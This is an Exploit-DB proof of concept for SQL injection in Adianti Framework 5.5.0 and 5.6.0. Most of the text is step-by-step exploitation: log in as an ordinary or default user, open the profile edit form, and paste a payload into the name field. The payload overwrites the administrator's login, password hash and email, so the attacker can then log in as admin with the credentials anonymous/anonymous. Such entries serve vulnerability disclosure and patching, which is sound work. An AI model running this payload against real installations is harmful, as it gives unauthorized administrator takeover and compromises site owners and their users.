Adianti Framework 5.5.0 – SQL Injection

  • 作者: Joner de Mello Assolin
    日期: 2019-01-21
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/46217/
  • # Exploit Title: [SQL Injection in Adianti Framework]
    # Date: [2018-12-18]
    # Exploit Author: [Joner de Mello Assolin]
    # Vendor Homepage: [https://www.adianti.com.br]
    # Version: [5.5.0 and 5.6.0] (REQUIRED)
    # Tested on: [XAMPP Version 7.2.2, phpMyAdmin 4.7.7 and 4.8.4, PHP 7.1 , Apache/2.4.29 (Win32) , libmysql - mysqlnd 5.0.12-dev – 20150407 and MariaDB 10.1]
    # Software Link: [https://www.adianti.com.br/download-center?app=template]
    
    
    
    The failure allows any ordinary user to enter SQL Injection and take over the administrator account or any other user of the system, 
    by editing the profile itself.
    
    
    
    POC:
    
    1-Register an ordinary user or use the framework standard(user=user password=user)
    
    2- Access the user profile and click edit http://localhost/template/index.php?class=SystemProfileForm&method=onEdit
    
    3- In the field name enter SQL injection and click Save:
    
    (SELECT 'hackeado'),login=(SELECT 'anonymous'),password=(SELECT '294de3557d9d00b3d2d8a1e6aab028cf'),email=(SELECT 'anonymous@anonymous.com')WHERE `id`=1#
    
    4-Go to the login screen and enter username and password: Now you can log in as administrator!.
    
    USER: anonymous
    
    PASSWORD: anonymous